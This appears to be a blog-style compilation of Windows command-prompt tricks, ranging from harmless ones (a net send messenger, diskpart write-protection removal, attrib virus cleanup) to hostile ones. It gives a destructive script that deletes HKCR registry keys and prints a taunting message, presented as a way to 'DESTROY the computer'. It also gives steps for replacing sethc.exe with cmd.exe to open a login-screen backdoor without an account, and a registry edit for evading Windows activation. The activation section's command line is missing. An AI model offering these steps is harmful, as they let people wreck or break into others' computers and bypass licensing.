Use Command Prompt to Talk with other computers on your network:-
All you need is your friends IP address and Command Prompt.
Firstly, open Notepad and enter:
set /p n=User:
set /p m=Message:
net send %n% %m%
Now save this as Messenger .bat.
Open the .bat file and Now type in the message you wish to send.
Before you press Enter it should look like this:
User: 56. 108. 104. 107
Now all you need to do is press
what is Script and Macro Viruses ?
Script viruses (sometimes called macro viruses) generally travel embedded in email and office automation documents, although they can be found in web pages as well.
Old fashioned program viruses are usually implemented in executable system code, whereas script viruses are usually written in a powerful high-level language that is compiled and run on the fly.
They often have sophisticated functionality and direct interfaces to high level applications such as word processing, spreadsheet, email, and web programs, and can wreak considerable havoc.
Since they first surfaced in office automation programs, they are sometimes also called macro viruses.
Script viruses can also propagate through IRC protocols.
Remove Computer Viruses Using Command Prompt
* Firs of all click on Start and type cmd.
* Now right click on cmd icon and select run as administrator.
* Now command prompt window will open, now select your drive which you want to remove virus.
* Let the drive be D.
* Now in cmd window type
attrib -s -h /s /d *.*
then press enter.
Now type dir by this all your content will get displayed.
Now if you notice and unusual file.exe and any of autorun.inf then rename it with the command(rename filename.extension newfilename)
Thats it now you can access your drives without affecting from viruses.
How To Remove Write Protection
Sometime our media say our USB Pendrive will not even get format.
It will show error message like “Disk is Write Protected” or “Remove The Write Protection or Use another USB”.
These all errors are because of write protection on our pendrive or sd cards.
There are many ways to fix this but in this post i will tell you the best methods to remove write protection.
>>Using Command Prompt
In this method we will remove write protection from pendrive using commands in Cmd. This will fully clean the write protection of the pendrive.
1. Click on Start->Cmd .
2. Type Diskpart and press enter.
3. Type list disk.
4. Type select disk 1 and this will select your Sdcard/USB pendrive.
5. Now type “attributes disk clear readonly” and press enter.
6. Now exit from cmd and format your Sdcard/USB pendrive.
This will remove write protection from your sd card or pendrive.
How to Use Windows 7 Without Activation
follw the steps:-
Step-1: Go to “Start Menu -> All Programs -> Accessories“.
Right click on the “Command Prompt” and select “Run as Administrator“. If you are not the administrator, then you are prompted to enter the password
Step-2: Now type the following command and hit Enter:
Step-3: You will be prompted to restart the computer. Once restarted, the trial period will once again be reset to 30 days. You can use the above command for up to 3 times by which you can extend the trial period to 120 days without activation.
Step-4: Now comes the actual trick by which you can extend the trial period for another 240 days. To do this, open the Registry Editor (type regedit in “Run” and hit Enter) and navigate to the following location:-
HKEY_LOCAL_MACHINE – SOFTWARE – Microsoft – Windows NT-CurrentVersion – SoftwareProtectionPlatform
Step-5: In the right-side pane, change value of SkipRearm to 1.
Step-6: Now, you should be able to use the slmgr -rearm command for another 8 times so that you can skip the activation process for another 240 days. So you will get 120 + 240 = 360 days of free Windows 7 usage.
120 days using “slmgr -rearm” command before registry edit
+ 240 days using “slmgr -rearm” command after registry edit
= 360 Days Enjoy 😉
How to Activate Command Prompt in the Login Screen
If you wish to have another way to access a computer without a user account, or you just want to impress your friends, you can get a command prompt window in the login screen!
Follw the steps:-
1. Open the start menu and click on Computer
2. Double click on your C: drive (or wherever Windows is installed)
3. Double click on the Windows folder, then click on the system32 folder.
4. Click into the search bar at the top right of the window and type ‘sethc’ without quotes, into the bar
5. Right click the file with a circular logo and click Rename
6. Rename the file ‘sethc2’, without quotes and click enter.
7. Click Yes in any boxes that ask you for administrator permission
8. Start a new search for ‘cmd’
9. Right click the file with a black-boxed logo and click ‘Copy’
10. Exit out of the search by clicking the red X in the search bar
11. Staying in the same folder, right click an empty area of the screen and click Paste
12. Right click the file you just created and click ‘Rename’
13. Name the file ‘sethc’ without quotes and press Enter
14. Close all open windows and press the Shift key 5 times.
15. A command prompt window should appear
Delete Key Of Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)*
cpoy/type the following code in notepad Code:-
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
ECHO Your computer has been fucked,Â Have a nice day.
save it as (reg .vbs) and run it
*NOTE* these codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANETLY deletes files on the computer that cannot be recovered. this will DESTROY the computer.